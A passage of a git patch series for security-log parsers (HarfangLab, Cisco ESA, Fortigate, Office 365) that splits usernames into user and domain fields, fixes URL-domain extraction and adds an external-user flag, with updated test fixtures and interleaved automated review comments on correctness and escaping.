"215fe295-905f-4a8d-8347-e9d438d4e415", + "999ba0c7-96b8-4c57-bf0e-63b24813c873" + ], "count": { "rules": 4, "users_impacted": 3 From ffe0e638b928cbc836114a3ba468de784ae12f97 Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Wed, 11 Dec 2024 12:07:11 +0200 Subject: [PATCH 141/150] Harfanglab - normalize `user.name` --- HarfangLab/harfanglab/CHANGELOG.md | 8 +- HarfangLab/harfanglab/ingest/parser.yml | 83 +++++++++++++++++-- HarfangLab/harfanglab/tests/alert.json | 5 +- HarfangLab/harfanglab/tests/alert_1.json | 5 +- HarfangLab/harfanglab/tests/alert_2.json | 5 +- HarfangLab/harfanglab/tests/alert_3.json | 5 +- HarfangLab/harfanglab/tests/alert_4.json | 5 +- .../tests/alert_false_positive.json | 5 +- .../harfanglab/tests/authentication.json | 8 +- HarfangLab/harfanglab/tests/dns.json | 5 +- HarfangLab/harfanglab/tests/network.json | 5 +- HarfangLab/harfanglab/tests/network2.json | 5 +- .../harfanglab/tests/process-event.json | 5 +- HarfangLab/harfanglab/tests/process.json | 5 +- HarfangLab/harfanglab/tests/process2.json | 5 +- HarfangLab/harfanglab/tests/process3.json | 5 +- HarfangLab/harfanglab/tests/process4.json | 5 +- 17 files changed, 130 insertions(+), 39 deletions(-) diff --git a/HarfangLab/harfanglab/CHANGELOG.md b/HarfangLab/harfanglab/CHANGELOG.md index b51c03c58..020bfb34e 100644 --- a/HarfangLab/harfanglab/CHANGELOG.md +++ b/HarfangLab/harfanglab/CHANGELOG.md @@ -7,7 +7,13 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0 ## [Unreleased] -### 2024-10-01 +### 2024-12-11 - 1.3.0 + +### Changed + +- Split username into `user.name` and `user.domain` + +### 2024-10-01 - 1.2.0 ### Added diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 34535641b..253355fce 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml 
@@ -171,7 +171,16 @@ stages: process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} event.category: ["network"] event.type: ["connection"] @@ -192,7 +201,6 @@ stages: process.pe.company: "{{json_event.message.pe_info.company_name}}" process.pe.product: "{{json_event.message.pe_info.product_name}}" process.executable: "{{json_event.message.image_name}}" - user.name: "{{json_event.message.username}}" process.parent.executable: "{{json_event.message.parent_image}}" process.parent.command_line: "{{json_event.message.parent_commandline}}" process.parent.name: '{{json_event.message.parent_image.split("\\") | last}}' @@ -202,6 +210,17 @@ stages: harfanglab.grandparent.process.command_line: "{{json_event.message.parent_commandline}}" harfanglab.grandparent.process.ancestors: "{{json_event.message.ancestors.split('|')}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + event.category: ["process"] event.type: ["start"] - set: 
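Review bot: The new `user.domain` templates render an empty string whenever the username holds no backslash, and every fixture in this diff (`REDACTED\valves`, `NT AUTHORITY\SYSTEM`, `test-domain\work-laptop$`, …) contains one, so the no-backslash path — where `user.domain` is either dropped or stored as `""` depending on how the engine treats empty `set` values — is untested. The file's own convention for a conditional field is a separate `- set:` with a `filter:`, e.g. `user.domain: "{{ json_event.message.username.split('\\')[0] }}"` under `filter: "{{ '\\' in json_event.message.username }}"`, which sidesteps the question. The same ten-line block is pasted into the two other hunks on this line and into the hunks on the next two lines with only the source field changed; a one-line comment above the first copy, e.g. `# split a DOMAIN\user account into user.domain / user.name`, would name the convention for later readers. The enclosing `- set:` stages begin outside the hunks.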
@@ -261,7 +280,17 @@ stages: process.pe.product: "{{json_event.message.process.pe_info.product_name}}" process.executable: "{{json_event.message.process.image_name}}" - user.name: "{{json_event.message.process.username}}" + + user.name: > + {%- if '\\' not in json_event.message.process.username -%} + {{ json_event.message.process.username }} + {%- else -%} + {{ json_event.message.process.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.process.username -%} + {{ json_event.message.process.username.split('\\')[0] }} + {%- endif -%} process.parent.executable: "{{json_event.message.process.parent_image}}" process.parent.command_line: "{{json_event.message.process.parent_commandline}}" @@ -726,9 +755,29 @@ stages: event.code: "{{json_event.message.windows.event_id}}" event.action: "{{json_event.message.object_type}}" user.id: "{{json_event.message.windows.source_sid}}" - user.name: "{{json_event.message.source_username}}" user.target.id: "{{json_event.message.windows.target_sid}}" - user.target.name: "{{json_event.message.target_username}}" + + user.name: > + {%- if '\\' not in json_event.message.source_username -%} + {{ json_event.message.source_username }} + {%- else -%} + {{ json_event.message.source_username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.source_username -%} + {{ json_event.message.source_username.split('\\')[0] }} + {%- endif -%} + + user.target.name: > + {%- if '\\' not in json_event.message.target_username -%} + {{ json_event.message.target_username }} + {%- else -%} + {{ json_event.message.target_username.split('\\')[1] }} + {%- endif -%} + user.target.domain: > + {%- if '\\' in json_event.message.target_username -%} + {{ json_event.message.target_username.split('\\')[0] }} + {%- endif -%} dns_info: actions: 
@@ -737,10 +786,20 @@ stages: event.type: ["info"] process.pid: "{{json_event.message.pid}}" process.executable: "{{json_event.message.process_image_path}}" - user.name: "{{json_event.message.username}}" dns.question.type: "{{json_event.message.query_type}}" dns.question.name: "{{json_event.message.requested_name}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + auditlog_info: actions: - set: @@ -750,11 +809,21 @@ stages: http.response.status_code: "{{json_event.message.response_status_code}}" url.path: "{{json_event.message.request_path}}" user_agent.original: "{{json_event.message.user_agent}}" - user.name: "{{json_event.message.username}}" source.ip: "{{json_event.message.ip_address}}" event.reason: "{{json_event.message.log_description}}" event.action: "{{json_event.message.log_slug}}" + user.name: > + {%- if '\\' not in json_event.message.username -%} + {{ json_event.message.username }} + {%- else -%} + {{ json_event.message.username.split('\\')[1] }} + {%- endif -%} + user.domain: > + {%- if '\\' in json_event.message.username -%} + {{ json_event.message.username.split('\\')[0] }} + {%- endif -%} + agentlog_info: actions: - set: diff --git a/HarfangLab/harfanglab/tests/alert.json b/HarfangLab/harfanglab/tests/alert.json index 0f8e1a0d4..6acde1285 100644 --- a/HarfangLab/harfanglab/tests/alert.json +++ b/HarfangLab/harfanglab/tests/alert.json @@ -76,7 +76,7 @@ "REDACTED" ], "user": [ - "REDACTED\\valves" + "valves" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "YARA binary check" }, "user": { - "name": "REDACTED\\valves" + "domain": "REDACTED", + "name": "valves" } } } \ No newline at end of file 
diff --git a/HarfangLab/harfanglab/tests/alert_1.json b/HarfangLab/harfanglab/tests/alert_1.json index b69152813..9ac1abc0a 100644 --- a/HarfangLab/harfanglab/tests/alert_1.json +++ b/HarfangLab/harfanglab/tests/alert_1.json @@ -77,7 +77,7 @@ "PL-3049" ], "user": [ - "EXAMPLE\\jdoe" + "jdoe" ] }, "rule": { @@ -87,7 +87,8 @@ "name": "File Added/Modified in Startup Directory" }, "user": { - "name": "EXAMPLE\\jdoe" + "domain": "EXAMPLE", + "name": "jdoe" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/alert_2.json b/HarfangLab/harfanglab/tests/alert_2.json index 310b001a9..60c039be7 100644 --- a/HarfangLab/harfanglab/tests/alert_2.json +++ b/HarfangLab/harfanglab/tests/alert_2.json @@ -83,7 +83,7 @@ "PL3024" ], "user": [ - "EXAMPLE\\jdoe" + "jdoe" ] }, "rule": { @@ -93,7 +93,8 @@ "name": "Registry Autorun Key Added" }, "user": { - "name": "EXAMPLE\\jdoe", + "domain": "EXAMPLE", + "name": "jdoe", "roles": "EXAMPLE" } } diff --git a/HarfangLab/harfanglab/tests/alert_3.json b/HarfangLab/harfanglab/tests/alert_3.json index db3a57056..f37d2fad4 100644 --- a/HarfangLab/harfanglab/tests/alert_3.json +++ b/HarfangLab/harfanglab/tests/alert_3.json @@ -84,7 +84,7 @@ "SRV001" ], "user": [ - "EXAMPLE\\j.doe" + "j.doe" ] }, "rule": { @@ -94,7 +94,8 @@ "name": "PowerShellInvoke-CommandExecutedonRemoteHost" }, "user": { - "name": "EXAMPLE\\j.doe", + "domain": "EXAMPLE", + "name": "j.doe", "roles": "Servers" } } diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json index 8a3745f19..1a45b2b22 100644 --- a/HarfangLab/harfanglab/tests/alert_4.json +++ b/HarfangLab/harfanglab/tests/alert_4.json @@ -85,7 +85,7 @@ "HOST01" ], "user": [ - "DOMAINSI\\JDOE" + "JDOE" ] }, "rule": { @@ -105,7 +105,8 @@ "top_level_domain": "com" }, "user": { - "name": "DOMAINSI\\JDOE", + "domain": "DOMAINSI", + "name": "JDOE", "roles": "DOMAIN_Postes_de_travail_Windows" } } 
diff --git a/HarfangLab/harfanglab/tests/alert_false_positive.json b/HarfangLab/harfanglab/tests/alert_false_positive.json index f01c2921f..99b1994fb 100644 --- a/HarfangLab/harfanglab/tests/alert_false_positive.json +++ b/HarfangLab/harfanglab/tests/alert_false_positive.json @@ -76,7 +76,7 @@ "pc123" ], "user": [ - "XXX\\XXX" + "XXX" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "Discovery: Process list" }, "user": { - "name": "XXX\\XXX" + "domain": "XXX", + "name": "XXX" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/authentication.json b/HarfangLab/harfanglab/tests/authentication.json index 91af4cc19..a00b26310 100644 --- a/HarfangLab/harfanglab/tests/authentication.json +++ b/HarfangLab/harfanglab/tests/authentication.json @@ -58,7 +58,7 @@ "127.0.0.1" ], "user": [ - "test-domain\\work-laptop$" + "work-laptop$" ] }, "sekoiaio": { @@ -78,12 +78,14 @@ "ip": "127.0.0.1" }, "user": { + "domain": "test-domain", "id": "S-1-5-18", - "name": "test-domain\\work-laptop$", + "name": "work-laptop$", "roles": "custom-group", "target": { + "domain": "work-laptop", "id": "S-1-0-0", - "name": "work-laptop\\administrateur" + "name": "administrateur" } } } diff --git a/HarfangLab/harfanglab/tests/dns.json b/HarfangLab/harfanglab/tests/dns.json index acf1cc407..903c7d68d 100644 --- a/HarfangLab/harfanglab/tests/dns.json +++ b/HarfangLab/harfanglab/tests/dns.json @@ -57,11 +57,12 @@ "work-laptop" ], "user": [ - "test-domain\\john.doe" + "john.doe" ] }, "user": { - "name": "test-domain\\john.doe", + "domain": "test-domain", + "name": "john.doe", "roles": "custom-group" } } diff --git a/HarfangLab/harfanglab/tests/network.json b/HarfangLab/harfanglab/tests/network.json index 0a8eef023..e047efaf0 100644 --- a/HarfangLab/harfanglab/tests/network.json +++ b/HarfangLab/harfanglab/tests/network.json @@ -50,7 +50,7 @@ "192.168.120.41" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "source": { 
@@ -59,7 +59,8 @@ "port": 21955 }, "user": { - "name": "NT AUTHORITY\\SYSTEM" + "domain": "NT AUTHORITY", + "name": "SYSTEM" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/network2.json b/HarfangLab/harfanglab/tests/network2.json index 43ba71477..b350a10ac 100644 --- a/HarfangLab/harfanglab/tests/network2.json +++ b/HarfangLab/harfanglab/tests/network2.json @@ -51,7 +51,7 @@ "185.202.2.238" ], "user": [ - "NT AUTHORITY\\NETWORK SERVICE" + "NETWORK SERVICE" ] }, "source": { @@ -60,7 +60,8 @@ "port": 42221 }, "user": { - "name": "NT AUTHORITY\\NETWORK SERVICE" + "domain": "NT AUTHORITY", + "name": "NETWORK SERVICE" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process-event.json b/HarfangLab/harfanglab/tests/process-event.json index abbbd338b..9f1f078f3 100644 --- a/HarfangLab/harfanglab/tests/process-event.json +++ b/HarfangLab/harfanglab/tests/process-event.json @@ -81,11 +81,12 @@ "SFRTAOA" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "NT AUTHORITY\\SYSTEM", + "domain": "NT AUTHORITY", + "name": "SYSTEM", "roles": "Group1" } } diff --git a/HarfangLab/harfanglab/tests/process.json b/HarfangLab/harfanglab/tests/process.json index c91f0a2c0..024f674a3 100644 --- a/HarfangLab/harfanglab/tests/process.json +++ b/HarfangLab/harfanglab/tests/process.json @@ -74,11 +74,12 @@ "EXCHANGE" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "NT AUTHORITY\\SYSTEM" + "domain": "NT AUTHORITY", + "name": "SYSTEM" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process2.json b/HarfangLab/harfanglab/tests/process2.json index f01c2921f..99b1994fb 100644 --- a/HarfangLab/harfanglab/tests/process2.json +++ b/HarfangLab/harfanglab/tests/process2.json @@ -76,7 +76,7 @@ "pc123" ], "user": [ - "XXX\\XXX" + "XXX" ] }, "rule": { 
@@ -86,7 +86,8 @@ "name": "Discovery: Process list" }, "user": { - "name": "XXX\\XXX" + "domain": "XXX", + "name": "XXX" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process3.json b/HarfangLab/harfanglab/tests/process3.json index 035f70d0f..3e464ccab 100644 --- a/HarfangLab/harfanglab/tests/process3.json +++ b/HarfangLab/harfanglab/tests/process3.json @@ -74,11 +74,12 @@ "REDACTED" ], "user": [ - "NT AUTHORITY\\NETWORK SERVICE" + "NETWORK SERVICE" ] }, "user": { - "name": "NT AUTHORITY\\NETWORK SERVICE" + "domain": "NT AUTHORITY", + "name": "NETWORK SERVICE" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process4.json b/HarfangLab/harfanglab/tests/process4.json index a19bf13fc..3f32333c2 100644 --- a/HarfangLab/harfanglab/tests/process4.json +++ b/HarfangLab/harfanglab/tests/process4.json @@ -87,11 +87,12 @@ "jdoe" ], "user": [ - "TST USER\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "TST USER\\SYSTEM", + "domain": "TST USER", + "name": "SYSTEM", "roles": "test_group" } } From bc460dc02fadba94aa2dceb3e0b86ee58eca8967 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 11 Dec 2024 11:38:21 +0100 Subject: [PATCH 142/150] Fix for url with no http header --- Cisco/cisco-esa/ingest/parser.yml | 2 +- Cisco/cisco-esa/tests/test_ingest_log5.json | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index ea082905c..06a4f7dec 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml 
@@ -211,7 +211,7 @@ stages: {%- endfor %}] cisco.esa.url_domain: >- [{% for url, details in json_event_url_details.message.items() %} - {% if details.get('ExpandedUrl') is not none %}"{{url.split('/')[2]}}", "{{ details.ExpandedUrl.split('/')[2] }}"{% else %}"{{ url.split('/')[2] }}"{% endif %} + {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} {% if not loop.last %},{% endif %} {% endfor %}] cisco.esa.url: >- diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 6bc9470fd..46ca9ebb4 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -59,10 +59,10 @@ "www.twitter.com" ], "url_domain": [ - "", "facebook.com", "tiktok.com", - "tinyurl.es" + "tinyurl.es", + "www.twitter.com" ] } }, From 0c17da55c79c3cb0498e27bd152797f8f647ec0e Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 11 Dec 2024 13:52:16 +0100 Subject: [PATCH 143/150] fix to avoid empty lists --- Cisco/cisco-esa/ingest/parser.yml | 23 ++++++++++++--------- Cisco/cisco-esa/tests/test_ingest_log7.json | 4 +--- 2 files changed, 14 insertions(+), 13 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 06a4f7dec..8f3acbeb3 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml 
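Review bot: The new expression removes only lowercase `https://` and `http://`, so a URL written as `HTTP://…`, using another scheme, or carrying `user@` or `:port` before the first `/` still lands in `cisco.esa.url_domain` with that material attached, even though the commit sets out to fix the scheme-less case; `url.split('://')[-1].split('/')[0]` handles any scheme and the no-scheme input in one step, and appending `.split('@')[-1].split(':')[0]` would strip user info and port. The expression is pasted three times on the one line (twice more for `ExpandedUrl`), so a small `{% macro %}` would keep whichever form is chosen consistent. The enclosing `actions:` list begins outside the hunk.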
@@ -209,16 +209,6 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url_domain: >- - [{% for url, details in json_event_url_details.message.items() %} - {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} - {% if not loop.last %},{% endif %} - {% endfor %}] - cisco.esa.url: >- - [{% for url, details in json_event_url_details.message.items() %} - {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} - {% if not loop.last %},{% endif %} - {% endfor %}] url.domain: "{{parsed_event.message.EAURLDetails}}" cisco.esa.delivery.connection_id: "{{parsed_event.message.ESADCID}}" cisco.esa.injection.connection_id: "{{parsed_event.message.ESAICID}}" 
@@ -237,6 +227,19 @@ stages: cisco.esa.helo.ip: "{{parsed_event.message.ESAHeloIP}}" filter: "{{parsed_event.message.ESAHeloIP | is_ipaddress}}" + - set: + cisco.esa.url_domain: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + cisco.esa.url: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + filter: "{{json_event_url_details.message | length > 0}}" + - set: cisco.esa.helo.domain: "{{parsed_event.message.ESAHeloDomain}}" cisco.esa.sender_group: "{{parsed_event.message.ESASenderGroup}}" diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 45d8465a7..b77951dcf 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,9 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [], - "url_domain": [] + } } }, "email": { From 41472aad15b100b1777f2793d1e0fea503bc93e2 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 11 Dec 2024 14:38:07 +0100 Subject: [PATCH 144/150] fix(Fortigate): reorder the fields for destination.domain --- Fortinet/fortigate/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Fortinet/fortigate/ingest/parser.yml b/Fortinet/fortigate/ingest/parser.yml index 4cda504c7..cbb9b311a 100644 --- a/Fortinet/fortigate/ingest/parser.yml +++ b/Fortinet/fortigate/ingest/parser.yml 
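Review bot: Both lists in the new `set` insert `url` and `details.ExpandedUrl` into a hand-built JSON array as `"{{ url }}"`, so a URL containing a double quote or a backslash — content chosen by whoever sent the scanned mail — breaks the array and the field fails to parse; `{{ url | tojson }}` (if the engine exposes Jinja's built-in filter) escapes it. The new `filter:` depends on `json_event_url_details.message | length`; when the upstream stage did not run that value is presumably undefined and counts as empty, which is fine, but a one-line comment such as `# skip when EAURLDetails is absent or empty so that no empty lists are emitted` would record the intent the fixture change encodes. The enclosing `actions:` list begins outside the hunk.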
@@ -191,7 +191,7 @@ stages:
 event.action: "{{parsed_event.message.name or parsed_event.message.FTNTFGTaction or parsed_event.message.FortinetFortiGateaction or parsed_event.message.act or parsed_event.message.action or parsed_event.message.reason}}"
 destination.address: "{{parsed_event.message.dstip or parsed_event.message.dst}}"
 destination.bytes: "{{parsed_event.message.rcvdbyte or parsed_event.message.in}}"
- destination.domain: "{{parsed_event.message.remotename or parsed_event.message.hostname or parsed_event.message.dhost}}"
+ destination.domain: "{{parsed_event.message.remotename or parsed_event.message.dhost or parsed_event.message.hostname}}"
 destination.mac: "{{parsed_event.message.dstmac}}"
 destination.nat.port: "{{parsed_event.message.destinationTranslatedPort}}"
 destination.packets: "{{parsed_event.message.rcvdpkt or parsed_event.message.FTNTFGTrcvpkt or parsed_event.message.FortinetFortiGatercvdpkt or parsed_event.message.get('Packets Received')}}"
From 2fd4878c938a1abfd534d47aaea1b057c3f8f60a Mon Sep 17 00:00:00 2001
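Review bot: Nothing in the change records why `dhost` now outranks `hostname` for `destination.domain`, and the diffstat shows no CHANGELOG entry although an event carrying both keys will now normalise differently than before. A comment on the line, e.g. `# prefer dhost over hostname when both are present (see <TICKET-ID placeholder>)`, plus a CHANGELOG line would keep the precedence from being flipped back by the next reader. The enclosing `- set:` stage begins outside the hunk.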
From: lvoloshyn-sekoia Date: Wed, 11 Dec 2024 16:54:29 +0200 Subject: [PATCH 145/150] O365 - parse email for external users --- Office 365/o365/_meta/fields.yml | 5 +++++ Office 365/o365/ingest/parser.yml | 7 +++++-- Office 365/o365/tests/ad.json | 1 + Office 365/o365/tests/ad_1.json | 1 + Office 365/o365/tests/add_member_to_role.json | 1 + .../o365/tests/automated_investigation_and_response.json | 1 + .../o365/tests/automated_investigation_and_response_1.json | 1 + ..._investigation_and_response_with_additional_fields.json | 1 + ...nvestigation_and_response_with_additional_fields_1.json | 1 + ...tomated_investigation_and_response_with_attachment.json | 1 + Office 365/o365/tests/browser_log.json | 1 + Office 365/o365/tests/clientipadress.json | 1 + Office 365/o365/tests/compliancemanager-scorechange.json | 1 + Office 365/o365/tests/email_reported.json | 1 + Office 365/o365/tests/exchange_event1.json | 1 + Office 365/o365/tests/exchange_item_aggregated.json | 1 + Office 365/o365/tests/exchange_item_group.json | 1 + Office 365/o365/tests/exchange_item_group_2.json | 1 + Office 365/o365/tests/exchange_item_update.json | 1 + Office 365/o365/tests/file_previewed.json | 1 + Office 365/o365/tests/file_size.json | 1 + Office 365/o365/tests/file_sync_download_full.json | 1 + Office 365/o365/tests/file_visited.json | 1 + Office 365/o365/tests/form_log.json | 1 + Office 365/o365/tests/inbox_rule.json | 1 + Office 365/o365/tests/managed_sync.json | 1 + Office 365/o365/tests/mass_download.json | 1 + Office 365/o365/tests/mcas_alert.json | 1 + .../tests/microsoft_defender_threatintelligence_atp.json | 1 + .../tests/microsoft_defender_threatintelligence_mail.json | 1 + .../microsoft_defender_threatintelligence_url_click.json | 1 + Office 365/o365/tests/operation_properties_01.json | 1 + Office 365/o365/tests/operation_properties_02.json | 1 + Office 365/o365/tests/power_bi.json | 1 + Office 365/o365/tests/remove_member_from_role.json | 1 + Office 
365/o365/tests/security_compliance_alert.json | 1 + Office 365/o365/tests/security_compliance_alert_2.json | 1 + Office 365/o365/tests/security_compliance_alert_3.json | 1 + Office 365/o365/tests/security_compliance_alert_4.json | 1 + Office 365/o365/tests/security_compliance_alert_5.json | 1 + Office 365/o365/tests/security_compliance_alert_7.json | 1 + .../tests/security_compliance_alert_malicious_url.json | 1 + Office 365/o365/tests/source_log.json | 1 + Office 365/o365/tests/targetusername.json | 1 + Office 365/o365/tests/teams_message_has_link.json | 1 + Office 365/o365/tests/teams_with_foreign_tenant_users.json | 1 + .../o365/tests/teams_with_foreign_tenant_users_2.json | 1 + .../o365/tests/teams_with_foreign_tenant_users_3.json | 1 + .../o365/tests/teams_without_foreign_tenant_users.json | 1 + Office 365/o365/tests/threat_intel.json | 1 + Office 365/o365/tests/update_group.json | 1 + Office 365/o365/tests/update_user.json | 1 + Office 365/o365/tests/update_user_empty_source_ip.json | 1 + Office 365/o365/tests/user_logged_in.json | 1 + Office 365/o365/tests/user_logged_in_2.json | 1 + Office 365/o365/tests/user_login_failed.json | 1 + 56 files changed, 64 insertions(+), 2 deletions(-) diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 02c13a28b..dfa4178de 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -513,6 +513,11 @@ office365.user_type.code: name: office365.user_type.code type: long +office365.user_type.is_external: + description: Whether user is external + name: office365.user_type.is_external + type: boolean + office365.user_type.name: description: The translated type of the user that performed the operation name: office365.user_type.name diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index f0e861645..8568883db 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml 
@@ -77,7 +77,7 @@ stages:
 event.action: "{{json_event.message.Operation}}"
 event.code: "{{json_event.message.RecordType | string}}"
 event.reason: "{{json_event.message.ActionName}}"
- user.name: "{{json_event.message.UserId}}"
+ user.name: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}"
 user.id: "{{json_event.message.UserKey}}"
 organization.id: "{{json_event.message.OrganizationId}}"
 action.id: "{{json_event.message.RecordType}}"
@@ -89,9 +89,12 @@ stages:
 filter: "{{parse_client_ip.result.ip | is_ipaddress}}"
 - set:
- user.email: "{{json_event.message.UserId}}"
+ user.email: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}"
 filter: '{{"@" in json_event.message.UserId}}'
+ - set:
+ office365.user_type.is_external: "{{'urn:spo:guest#' in json_event.message.UserId}}"
+
 - set:
 source.ip: "{{parse_client_ip_address.result.ip}}"
 source.port: "{{parse_client_ip_address.result.port}}"
diff --git a/Office 365/o365/tests/ad.json b/Office 365/o365/tests/ad.json
index 4cfb5c636..359da7dbc 100644
--- a/Office 365/o365/tests/ad.json
+++ b/Office 365/o365/tests/ad.json
@@ -44,6 +44,7 @@
 "result_status": "Succeeded",
 "user_type": {
 "code": 0,
+ "is_external": false,
 "name": "Regular"
 }
 },
diff --git a/Office 365/o365/tests/ad_1.json b/Office 365/o365/tests/ad_1.json
index 2474aeae8..aa501f91a 100644
--- a/Office 365/o365/tests/ad_1.json
+++ b/Office 365/o365/tests/ad_1.json
@@ -53,6 +53,7 @@
 "result_status": "Success",
 "user_type": {
 "code": 0,
+ "is_external": false,
 "name": "Regular"
 }
 },
diff --git a/Office 365/o365/tests/add_member_to_role.json b/Office 365/o365/tests/add_member_to_role.json
index 2ea3b7995..15b06db18 100644
--- a/Office 365/o365/tests/add_member_to_role.json
+++ b/Office 365/o365/tests/add_member_to_role.json
@@ -57,6 +57,7 @@
 "result_status": "Success",
 "user_type": {
 "code": 0,
+ "is_external": false,
 "name": "Regular"
 }
 },
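Review bot: In the `@@ -89` hunk, `office365.user_type.is_external` is derived by substring match (`'urn:spo:guest#' in ...`) while `user.name` and `user.email` strip the marker only when it is a prefix (`removeprefix`), so the flag and the stripped identity are computed by two different tests; if the marker only ever appears as a prefix, aligning them, e.g. `office365.user_type.is_external: "{{json_event.message.UserId.startswith('urn:spo:guest#')}}"`, removes the chance of `is_external: true` alongside an unstripped name. Separately, the old `{{json_event.message.UserId}}` rendered an empty string when the attribute was missing, whereas `.removeprefix(...)` is a method call on that value, so whether an event without UserId now fails the stage depends on the engine's undefined handling and is worth covering with a fixture that omits UserId. A guard such as `user.name: "{{(json_event.message.UserId | default('')).removeprefix('urn:spo:guest#')}}"` keeps the previous behaviour either way. Note the flag recognises only SharePoint Online guest URNs; other external identity representations, if any reach this feed, will still be reported as not external.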
diff --git a/Office 365/o365/tests/automated_investigation_and_response.json b/Office 365/o365/tests/automated_investigation_and_response.json index bb5f028e8..3ae14890a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response.json +++ b/Office 365/o365/tests/automated_investigation_and_response.json @@ -50,6 +50,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_1.json b/Office 365/o365/tests/automated_investigation_and_response_1.json index fb46179f0..b79920afb 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_1.json @@ -145,6 +145,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json index 6e6d8fd0f..e40af7314 100644 --- a/Office 